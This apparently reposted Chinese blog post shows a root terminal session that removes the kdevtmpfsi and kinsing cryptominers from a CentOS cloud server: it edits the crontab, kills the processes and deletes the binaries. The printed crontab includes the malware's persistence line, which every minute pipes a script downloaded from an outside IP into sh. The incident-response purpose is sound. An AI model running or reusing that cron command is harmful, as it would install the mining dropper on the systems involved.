首页 > 其他分享 >清理云服务器挖矿病毒kdevtmpfsi和kinsing

清理云服务器挖矿病毒kdevtmpfsi和kinsing

时间:2023-02-01 23:47:01浏览次数:52  
标签:kinsing 13 centos VM kdevtmpfsi step root gateway 挖矿

[root@VM-12-13-centos step-gateway]# crontab -l
# secu-tcs-agent monitor, install at Sun Mar 13 17:00:40 CST 2022
* * * * * /usr/local/sa/agent/secu-tcs-agent-mon-safe.sh > /dev/null 2>&1
* * * * * wget -q -O - http://185.122.204.197/scg.sh | sh > /dev/null 2>&1
[root@VM-12-13-centos step-gateway]# crontab -e
crontab: installing new crontab
[root@VM-12-13-centos step-gateway]# crontab -l
# secu-tcs-agent monitor, install at Sun Mar 13 17:00:40 CST 2022
* * * * * /usr/local/sa/agent/secu-tcs-agent-mon-safe.sh > /dev/null 2>&1
[root@VM-12-13-centos step-gateway]# systemctl reload crond.service 
[root@VM-12-13-centos step-gateway]# ps -aux | grep kdevtmpfsi
root      359186  0.0  0.0 308016  2412 ?        Ssl  23:22   0:00 /tmp/kdevtmpfsi
root      359692  0.0  0.0  12136  1100 pts/0    S+   23:25   0:00 grep --color=auto kdevtmpfsi
[root@VM-12-13-centos step-gateway]# ps -aux | grep kinsing
root      332241  0.0  0.7 710608 28072 ?        Sl   20:56   0:01 /etc/kinsing
root      359710  0.0  0.0  12136  1124 pts/0    S+   23:25   0:00 grep --color=auto kinsing
[root@VM-12-13-centos step-gateway]# kill -9 332241
[root@VM-12-13-centos step-gateway]# kill -9 359186
[root@VM-12-13-centos step-gateway]# rm -f /tmp/kdevtmpfsi /etc/kinsing 
[root@VM-12-13-centos step-gateway]# ps -aux | grep kdevtmpfsi
root      360008  0.0  0.0  12136  1160 pts/0    S+   23:27   0:00 grep --color=auto kdevtmpfsi
[root@VM-12-13-centos step-gateway]# ps -aux | grep kinsing
root      360017  0.0  0.0  12136  1156 pts/0    S+   23:27   0:00 grep --color=auto kinsing
[root@VM-12-13-centos step-gateway]# 

 

标签:kinsing,13,centos,VM,kdevtmpfsi,step,root,gateway,挖矿
From: https://www.cnblogs.com/517cn/p/17084504.html

相关文章